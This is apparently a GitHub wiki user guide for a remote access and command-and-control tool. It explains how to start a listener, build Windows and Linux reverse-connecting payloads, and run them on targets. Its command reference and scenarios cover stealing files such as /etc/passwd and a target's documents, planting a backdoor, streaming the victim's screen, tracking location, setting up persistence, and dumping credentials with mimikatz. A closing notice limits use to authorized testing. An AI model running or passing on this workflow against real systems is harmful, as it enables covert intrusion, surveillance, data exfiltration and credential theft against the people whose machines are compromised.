Skip to content

user guide

Jump to bottom
SAM X86 edited this page Sep 27, 2025 · 1 revision

User Guide

Basic Operation

Step 1: Start the Listener

python3 listener.py -i 0.0.0.0 -p 4444

Parameters:

-i, --ip: IP address to bind (default: 0.0.0.0)

-p, --port: Port to listen on (default: 4444)

Generate a Payload

Windows payload

python3 builder.py -t windows -i 192.168.1.100 -p 4444

Linux payload

python3 builder.py -t linux -i 192.168.1.100 -p 4444

Parameters:

  • -t, --target: Target platform (windows or linux)
  • -i, --ip: Listener IP address (required)
  • -p, --port: Listener port (required)

Execute Payload on Target

  • The builder creates standalone executables in the dist/ directory. Transfer and execute the payload on the target system.

Manage the Connection

  • Once the target connects, you'll see confirmation in the listener and get the kush> prompt.

Interactive Commands

  • Basic Shell Commands
kush> whoami
kush> ipconfig
kush> ls -la
kush> pwd
  • Any system command can be executed directly.

File Operations

  • Download files from target:
kush> download /etc/passwd
kush> download C:\\Windows\\system32\\drivers\\etc\\hosts

Upload files to target:

kush> upload malware.py /tmp/backdoor.py
kush> upload config.txt C:\\Users\\Public\\config.txt

Change directory:

kush> cd /tmp
kush> cd C:\\Windows\\Temp

Advanced Features

kush> screenshot
  • Saves as screenshot_[timestamp].jpg locally

Screen Streaming:

kush> start_stream 0.5

Start with 0.5s interval

Opens browser with real-time view

kush> stop_stream

To stop streaming

Location Tracking:

kush> get_gps

Returns IP-based location information

Persistence Setup:

kush> windows_persistence

Windows persistence

kush> linux_persistence

linux persistence

Usage Examples

Scenario 1: Basic Reconnaissance

kush> whoami
kush> systeminfo
kush> ipconfig
kush> netstat -an
kush> screenshot

Scenario 2: Data Exfiltration

kush> cd C:\\Users\\Target\\Documents
kush> download important.docx
kush> download secret_data.xlsx

Scenario 3: Lateral Movement

kush> upload mimikatz.exe C:\\Windows\\Temp\\mimikatz.exe
kush> C:\\Windows\\Temp\\mimikatz.exe privilege::debug
kush> C:\\Windows\\Temp\\mimikatz.exe sekurlsa::logonpasswords

Command History and Completion

  • Use arrow keys for command history

  • Tab completion for file paths in upload/download commands

  • Typo correction suggests similar valid commands

Session Management

  • Exit gracefully:
kush> exit

Handle disconnections:

  • Listener will wait for new connections

  • Restart payload on target to reconnect

⚠️ Legal & Ethical Notice: This framework is strictly for authorized penetration testing, red-team exercises, and personal lab research. Running this tool on systems you don't own or without explicit permission is illegal.

Clone this wiki locally